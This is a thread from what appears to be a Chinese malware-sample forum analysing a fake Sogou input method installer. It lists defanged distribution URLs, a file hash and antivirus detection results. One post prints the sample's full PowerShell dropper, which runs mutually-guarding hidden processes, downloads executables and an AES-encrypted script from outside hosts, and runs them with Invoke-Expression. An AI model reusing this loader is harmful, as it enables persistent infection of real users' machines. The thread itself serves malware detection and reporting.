假的搜狗输入法

显示全部楼层 · 发表于 3 天前

本帖最后由 Rukia 于 2025-11-3 23:13 编辑

火绒已入库且专杀工具已支持查杀
VirusTotal - File - 2f6b28b5e03b657ad676513b941bc3d5ec30db2cc00b4a50409f7866ef210915

1. hxxps://sogo-shurufa[.]org/

2. hxxps://yuanqibizhi[.]net/%E6%90%9C%E7%8B%97%E6%8B%BC%E9%9F%B3%E8%BE%93%E5%85%A5%E6%B3%95[.]exe

搜狗拼音输入法.exe

2f6b28b5e03b657ad676513b941bc3d5ec30db2cc00b4a50409f7866ef210915

Wormhole - 简单、私密的文件共享

解压密码: infected

显示全部楼层 · 发表于 3 天前

显示全部楼层 · 发表于前天 00:31

这个下载地址，跟我捕获的那个office一个域名，一个团伙的

显示全部楼层 · 发表于前天 00:55

op clean：https://opentip.kaspersky.com/2F ... /results?tab=upload
（未上报）

显示全部楼层 · 发表于前天 01:07

老脚本，换了个下载地址

# 双进程互相守护脚本
# 该脚本会启动两个实例，互相监视，确保任务不间断。
# --- 全局配置 ---
# 使用一个稳定的临时目录来存储进程ID文件
$pidDir = Join-Path $env:TEMP "escsvc_pids"
if (-not ([System.IO.Directory]::Exists($pidDir))) {
New-Item -Path $pidDir -ItemType Directory -Force | Out-Null
}
$pidFileA = Join-Path $pidDir "pid_a.txt"
$pidFileB = Join-Path $pidDir "pid_b.txt"
$mutexNameA = "Global\escsvc_process_A_mutex"
$mutexNameB = "Global\escsvc_process_B_mutex"
$myPid = $pid
$role = "None"
$mutexA = $null
$mutexB = $null
# --- 角色分配 ---
$createdNew = $false
# 尝试成为进程A
try {
$refCreatedNew = [ref]$createdNew
$mutexA = New-Object System.Threading.Mutex($true, $mutexNameA, $refCreatedNew)
if ($refCreatedNew.Value) {
      $role = "A"
      $myPid | Out-File -FilePath $pidFileA -Encoding ascii
} else {
      # 锁已存在，我们不拥有它，释放句柄
      $mutexA.Close(); $mutexA = $null
}
} catch { Write-Warning "无法检查互斥锁A: $($_.Exception.Message)" }
# 如果不能成为A，则尝试成为B
if ($role -eq "None") {
try {
      $createdNew = $false # 重置变量
      $refCreatedNew = [ref]$createdNew
      $mutexB = New-Object System.Threading.Mutex($true, $mutexNameB, $refCreatedNew)
      if ($refCreatedNew.Value) {
         $role = "B"
         $myPid | Out-File -FilePath $pidFileB -Encoding ascii
      } else {
         # 锁已存在，我们不拥有它，释放句柄
         $mutexB.Close(); $mutexB = $null
      }
} catch { Write-Warning "无法检查互斥锁B: $($_.Exception.Message)" }
}
# 如果两个角色都被占用，则退出
if ($role -eq "None") {
exit
}
# --- 主逻辑 ---
# 确保在脚本退出时，能释放锁并清理PID文件
try {
# ==========================================================
# 进程 A: 主工作进程 (执行监控任务 + 守护进程B)
# ==========================================================
if ($role -eq "A") {
      # --- 设置此进程的工作环境为静默 ---
      # 禁止所有命令（如Invoke-WebRequest）显示进度条
      $ProgressPreference = 'SilentlyContinue'
      # --- 实际监控任务所需参数 ---
      $dirPath = "C:\escsvc"
      $filesToCheck = @(
         "$dirPath\defaultpack.exe",
         "$dirPath\escsvc.exe",
         "$dirPath\toolsps.exe"
      )
      $downloadUrl = "https://delightful-river-09976af00.3.azurestaticapps.net/m-2/m-2.zip"
      $scriptDownloadUrl = "https://sg.storage.bunnycdn.com/mdds/m-2/2.txt"
      $processToCheck = "toolsps"
      # --- 主循环 ---
      while ($true) {
         # --- 1. 守护任务：检查并守护进程B ---
         $pidB = Get-Content $pidFileB -ErrorAction SilentlyContinue
         if (-not $pidB -or -not (Get-Process -Id $pidB -ErrorAction SilentlyContinue)) {
            # 如果进程B不存在，启动一个新的实例
            Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$($MyInvocation.MyCommand.Path)`"" -WindowStyle Hidden
         }
         # --- 2. 核心监控任务 ---
         # (这是之前脚本的所有监控逻辑)

         # 初始化目录
         if (-not ([System.IO.Directory]::Exists($dirPath))) {
               try { New-Item -Path $dirPath -ItemType Directory -Force -ErrorAction Stop | Out-Null } catch {}
         }
         try { (Get-Item -Path $dirPath -Force).Attributes = "Hidden, System" } catch {}
         # 检查文件是否存在
         $allFilesExist = $true
         foreach ($file in $filesToCheck) { if (-not ([System.IO.File]::Exists($file))) { $allFilesExist = $false; break } }
         # 如果文件不存在，则下载和解压
         if (-not $allFilesExist) {
            $baseDir = Join-Path $env:LOCALAPPDATA "escsvc_monitor"
            try {
                  if ([System.IO.Directory]::Exists($baseDir)) { Remove-Item -Path $baseDir -Recurse -Force }
                  New-Item -Path $baseDir -ItemType Directory -Force | Out-Null
                  $zipPath = Join-Path $baseDir "m-2.zip"
                  $unzipPath = Join-Path $baseDir "temp_unzip"
                  New-Item -Path $unzipPath -ItemType Directory -Force | Out-Null

                  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
                  Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath -ErrorAction Stop
                  if ((Get-Item $zipPath).Length -lt 100) { throw "下载失败" }
                  $shell = New-Object -ComObject Shell.Application
                  # 1044 = 4 (不显示进度) + 16 (全部选是) + 1024 (不显示错误UI)
                  $shell.NameSpace($unzipPath).CopyHere($shell.NameSpace($zipPath).Items(), 1044)
                  Start-Sleep -Seconds 10
                  # 检查并仅复制目标文件夹中确实丢失的文件
                  foreach ($targetFilePath in $filesToCheck) {
                     if (-not ([System.IO.File]::Exists($targetFilePath))) {
                        $filename = Split-Path -Path $targetFilePath -Leaf
                        $sourceFilePath = Join-Path $unzipPath $filename
                        if ([System.IO.File]::Exists($sourceFilePath)) {
                              Copy-Item -Path $sourceFilePath -Destination $targetFilePath -Force
                        }
                     }
                  }
            } catch {
                  Write-Warning "下载/解压失败: $($_.Exception.Message)"
            } finally {
                  if ([System.IO.Directory]::Exists($baseDir)) { Remove-Item -Path $baseDir -Recurse -Force }
            }
         }

         # 确保文件属性并检查 toolsps.exe 进程
         $allFilesNowExist = $true
         foreach ($file in $filesToCheck) { if (-not ([System.IO.File]::Exists($file))) { $allFilesNowExist = $false; break } }
         if ($allFilesNowExist) {
            foreach ($file in $filesToCheck) {
                  try { (Get-Item -Path $file -Force).Attributes = "Hidden, System" } catch {}
            }

            # 检查 toolsps.exe 进程是否运行
            if (-not (Get-Process -Name $processToCheck -ErrorAction SilentlyContinue)) {
                  # 进程不存在，下载 2.txt 并用 toolsps 执行
                  try {
                     $scriptFilePath = Join-Path $dirPath "2.txt"

                     # 下载 2.txt 文件
                     [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
                     Invoke-WebRequest -Uri $scriptDownloadUrl -OutFile $scriptFilePath -ErrorAction Stop

                     # 设置文件为隐藏系统属性
                     try { (Get-Item -Path $scriptFilePath -Force).Attributes = "Hidden, System" } catch {}

                     # 使用 toolsps 执行 AES 解密脚本
                     $toolspsPath = Join-Path $dirPath "toolsps.exe"
                     $decryptCommand = "`$AES=New-Object System.Security.Cryptography.AesManaged;`$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;`$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;`$AES.KeySize=256;`$AES.BlockSize=128;`$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');`$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',`$Salt,1000);`$AES.Key=`$DerivedBytes.GetBytes(32);`$AES.IV=`$DerivedBytes.GetBytes(16);`$Decryptor=`$AES.CreateDecryptor();`$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path '$scriptFilePath' -Raw -Encoding UTF8));`$DecryptedBytes=`$Decryptor.TransformFinalBlock(`$EncryptedBytes,0,`$EncryptedBytes.Length);`$DecryptedContent=[System.Text.Encoding]::UTF8.GetString(`$DecryptedBytes);Invoke-Expression `$DecryptedContent"

                     Start-Process -FilePath $toolspsPath -ArgumentList "-Command", $decryptCommand -WindowStyle Hidden
                  } catch {
                     Write-Warning "下载或执行2.txt失败: $($_.Exception.Message)"
                  }
            }
         }
         # --- 3. 循环间隔 ---
         Start-Sleep -Seconds 1
      }
}
# ==========================================================
# 进程 B: 专职守护进程 (只守护进程A)
# ==========================================================
if ($role -eq "B") {
      while ($true) {
         # --- 守护任务：检查并守护进程A ---
         $pidA = Get-Content $pidFileA -ErrorAction SilentlyContinue
         if (-not $pidA -or -not (Get-Process -Id $pidA -ErrorAction SilentlyContinue)) {
            # 如果进程A不存在，启动一个新的实例
            Start-Process "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File `"$($MyInvocation.MyCommand.Path)`"" -WindowStyle Hidden
         }
         # --- 循环间隔 ---
         Start-Sleep -Seconds 1
      }
}
}
finally {
# --- 清理工作 ---
# 脚本退出时，释放它所持有的锁并删除对应的PID文件
if ($role -eq "A" -and $mutexA) {
      if ([System.IO.File]::Exists($pidFileA)) { Remove-Item $pidFileA -Force }
      $mutexA.ReleaseMutex()
      $mutexA.Close()
}
if ($role -eq "B" -and $mutexB) {
      if ([System.IO.File]::Exists($pidFileB)) { Remove-Item $pidFileB -Force }
      $mutexB.ReleaseMutex()
      $mutexB.Close()
}
}

显示全部楼层 · 发表于前天 02:44

ulyanov2233 发表于 2025-11-4 01:07
老脚本，换了个下载地址

Bitdefender分析师不认为该文件是恶意的，该怎么描述比较好

显示全部楼层 · 发表于前天 03:06

红伞杀

显示全部楼层 · 发表于前天 08:26

华为 kill
红伞 kill
Symantec miss

显示全部楼层 · 发表于前天 09:05

Rukia 发表于 2025-11-4 02:44
Bitdefender分析师不认为该文件是恶意的，该怎么描述比较好

你让他看看triage沙箱做参考，triage给了这个文件十分百分百恶意https://tria.ge/251103-vjh9rstkeq/behavioral1，或者你把triage沙箱的报告下载下来用ai总结一下发给他们

显示全部楼层 · 发表于前天 09:30

火绒kill
360终端安全手动miss

[病毒样本] 假的搜狗输入法

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源